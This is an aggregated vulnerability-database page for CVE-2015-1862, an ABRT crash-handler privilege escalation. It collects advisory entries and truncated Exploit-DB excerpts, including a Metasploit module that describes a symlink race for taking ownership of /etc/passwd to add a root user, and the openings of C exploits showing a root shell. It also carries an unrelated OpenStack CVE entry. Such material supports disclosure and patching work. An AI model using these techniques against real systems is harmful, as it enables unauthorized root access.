CVE-2015-1862
Published 2018-02-09
Priority: P3 · 42 · high
CVSS 3.0: 7 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 3.08% (86.0th percentile)
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namespaced environment.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| abrt_project | abrt | <= 2.2.0 | — |
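CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.0 | HIGH | CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.9 | MEDIUM | AV:L/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 7.0 | HIGH | — |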
Red Hat
abrt: local privilege escalation through kernel.core_pattern
vendor_redhat·2015-04-14·CVSS 7.0
CVE-2015-1862 [HIGH] abrt: local privilege escalation through kernel.core_pattern
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namespaced environment.
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Statement: Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7
Package: abrt (Red Hat Enterprise Linux 6) - Not affected
Package: abrt (Red Hat Enterprise Linux 7) - Not affected
GHSA
GHSA-vwwv-5cgp-6jw3: The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directo
ghsa_unreviewed·2022-05-14
CVE-2015-1862 [HIGH] CWE-362 GHSA-vwwv-5cgp-6jw3: The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directo
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namespaced environment.
No detection rules found.
Exploit-DB
ABRT - 'raceabrt' Privilege Escalation (Metasploit)
exploitdb·2018-02-16·CVSS 7.8
CVE-2015-3315 [HIGH] ABRT - 'raceabrt' Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'ABRT raceabrt Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Fedora systems with
a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
as the crash handler.
A race condition allows local users to change ownership of arbitrary
files (CVE-2015-3315). This module uses a symlink attack on
'/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
then adds a new user with UID=0 GID=0 to gain root privileges.
Winning the race could take a few minutes.
This module has been tested successfully on ABRT packaged ve
Exploit-DB
Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
exploitdb·2015-04-14·CVSS 7.2
CVE-2015-1862 [HIGH] Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
---
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
# warning this file must be compiled with -static
//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- [email protected], April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
// yum install glibc-static or apt-get install libc6-dev
//
int main(int argc, char **argv)
{
int status;
Elf32_Phdr *hdr;
pid_t wrapper;
pid_t init;
pid_t subprocess;
unsigned i;
// Verify this is a static executable by checking the program headers for a
// d
Exploit-DB
Abrt (Fedora 21) - Race Condition
exploitdb·2015-04-14·CVSS 7.0
CVE-2015-3315 [HIGH] Abrt (Fedora 21) - Race Condition
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//
// This is a race condition exploit for CVE-2015-1862, targeting Fedora.
//
// Note: It can take a few minutes to win the race condition.
//
// -- [email protected], April 2015.
//
// $ cat /etc/fedora-release
// Fedora release 21 (Twenty One)
// $ ./a.out /etc/passwd
// [ wait a few minutes ]
// Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-1
Bugzilla
CVE-2015-5271 openstack-tripleo-heat-templates: unsafe pipeline ordering of swift staticweb middleware
bugzilla·2015-09-10·CVSS 7.5
CVE-2015-5271 [HIGH] CVE-2015-5271 openstack-tripleo-heat-templates: unsafe pipeline ordering of swift staticweb middleware
A flaw was discovered in the pipeline ordering of the swift staticweb middleware in the swiftproxy config generated from the openstack-tripleo-heat-templates. The staticweb middleware was incorrectly configured before keystone and under some conditions may allow unauthenticated access to private data.
Acknowledgements:
This issue was discovered by Christian Schwede and Emilien Macchi of Red Hat.
Discussion:
*** Bug 1261499 has been marked as a duplicate of this bug. ***
---
This issue has been addressed in the following products:
OpenStack 7.0 Director/Manager for RHEL 7
Via RHSA-2015:1862 https://access.redhat.com/errata/RHSA-2015:1862
---
Created openstack-tripleo-heat-templ
Bugzilla
CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
bugzilla·2015-04-13·CVSS 7.0
CVE-2015-1862 [HIGH] CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application.
Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"
This commit was added to abrt via: (To add support for handling crashes inside containers)
https://github.com/abrt/abrt/commit/4ab9fbe1a6b7889a0cd59b1406e8789d52171fd2
https://github.com/abrt/abrt/issues/809
But later removed via:
https://github.com/abrt/abrt/commit/cdb507ed336fa30151eefa6510d20c9271e7fc82
No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.
Support for containers wa
http://packetstormsecurity.com/files/131422/Fedora-abrt-Race-Condition.html
http://packetstormsecurity.com/files/131423/Linux-Apport-Abrt-Local-Root-Exploit.html
http://packetstormsecurity.com/files/131429/Abrt-Apport-Race-Condition-Symlink.html
http://seclists.org/fulldisclosure/2015/Apr/34
http://www.openwall.com/lists/oss-security/2015/04/14/4
http://www.securityfocus.com/bid/74263
https://bugzilla.redhat.com/show_bug.cgi?id=1211223
https://github.com/abrt/abrt/pull/810
https://www.exploit-db.com/exploits/36746/
https://www.exploit-db.com/exploits/36747/